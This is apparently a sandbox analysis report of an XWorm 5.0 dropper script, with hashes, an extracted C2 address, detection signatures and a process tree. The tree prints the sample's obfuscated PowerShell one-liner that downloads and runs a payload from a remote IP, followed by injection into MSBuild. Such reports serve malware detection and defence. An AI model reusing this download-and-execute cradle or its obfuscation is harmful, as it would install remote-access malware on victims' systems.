Analysis
- max time kernel: 142s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20250217-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20250217-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 28/02/2025, 07:11

Tasks
- Static task: static1
- Behavioral task: behavioral1
- Sample: 185.7.214_1.211.cmd
- Resource: win7-20240903-en
General
- Target: 185.7.214_1.211.cmd
- Size: 172B
- MD5: e3f9c42a3eee3a73f89685a8c2cc027e
- SHA1: 9d934754caf36aeb28f239f0011bedc4f68138f5
- SHA256: 2ce52ae9ba8114731368521d8dfdc951e901d13316ebaca8231ab398ae69c85a
- SHA512: 51d8caf7b1dad18417c236660e7c87b7bbf5a96b0bd78166eb3897b995938708767d1ad0e32250dc246d88f40838e228154d7028ecf708e4b54fea7f0fde57a9
Malware Config
Extracted
- URL: http://185.7.214.211/a.mp4
Extracted
- Family: xworm
- Version: 5.0
- C2: 185.7.214.211:4444
Signatures

Detect Xworm Payload (3 IoCs)
  resource                                                                      yara_rule
  behavioral2/files/0x000300000001e0fe-25.dat                                   family_xworm
  behavioral2/memory/5116-26-0x0000016B59670000-0x0000016B59680000-memory.dmp   family_xworm
  behavioral2/memory/2908-28-0x0000000000400000-0x000000000040E000-memory.dmp   family_xworm

Xworm family

Blocklisted process makes network request (1 IoCs)
  flow   pid    Process
  4      5116   powershell.exe

  pid    Process
  5116   powershell.exe

Suspicious use of SetThreadContext (1 IoCs)
  description                            pid    Process          procid_target
  PID 5116 set thread context of 2908    5116   powershell.exe   92
System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  description   ioc                                                           Process
  Key opened    \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language   MSBuild.exe
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid    Process
  5116   powershell.exe
  5116   powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description               pid    Process
  Token: SeDebugPrivilege   5116   powershell.exe
  Token: SeDebugPrivilege   2908   MSBuild.exe

Suspicious use of WriteProcessMemory (14 IoCs)
  description                         pid    Process          procid_target
  PID 4996 wrote to memory of 5116    4996   cmd.exe          86
  PID 4996 wrote to memory of 5116    4996   cmd.exe          86
  PID 5116 wrote to memory of 4104    5116   powershell.exe   90
  PID 5116 wrote to memory of 4104    5116   powershell.exe   90
  PID 4104 wrote to memory of 3296    4104   csc.exe          91
  PID 4104 wrote to memory of 3296    4104   csc.exe          91
  PID 5116 wrote to memory of 2908    5116   powershell.exe   92
  PID 5116 wrote to memory of 2908    5116   powershell.exe   92
  PID 5116 wrote to memory of 2908    5116   powershell.exe   92
  PID 5116 wrote to memory of 2908    5116   powershell.exe   92
  PID 5116 wrote to memory of 2908    5116   powershell.exe   92
  PID 5116 wrote to memory of 2908    5116   powershell.exe   92
  PID 5116 wrote to memory of 2908    5116   powershell.exe   92
  PID 5116 wrote to memory of 2908    5116   powershell.exe   92
Processes (process tree, indented by depth)

1. C:\Windows\system32\cmd.exe  (PID: 4996)
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\185.7.214_1.211.cmd"
   Signatures:
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID: 5116)
      Command line: powershell -Command "$A1='ject Net.WebCli';$B2='loadString(''http://185.7.214.211/a.mp4'')';$C3='ent).Down';$D4='(New-Ob';$E5=IEX ($D4,$A1,$C3,$B2 -Join '')|IEX"
      Signatures:
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID: 4104)
         Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dha3b2ei\dha3b2ei.cmdline"
         Signatures:
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID: 3296)
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7985.tmp" "c:\Users\Admin\AppData\Local\Temp\dha3b2ei\CSCE1BE0E28F29143E58B3DFAC3C0861E82.TMP"

      3. C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe  (PID: 2908)
         Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
         Signatures:
         - System Location Discovery: System Language Discovery
         - Suspicious use of AdjustPrivilegeToken
Downloads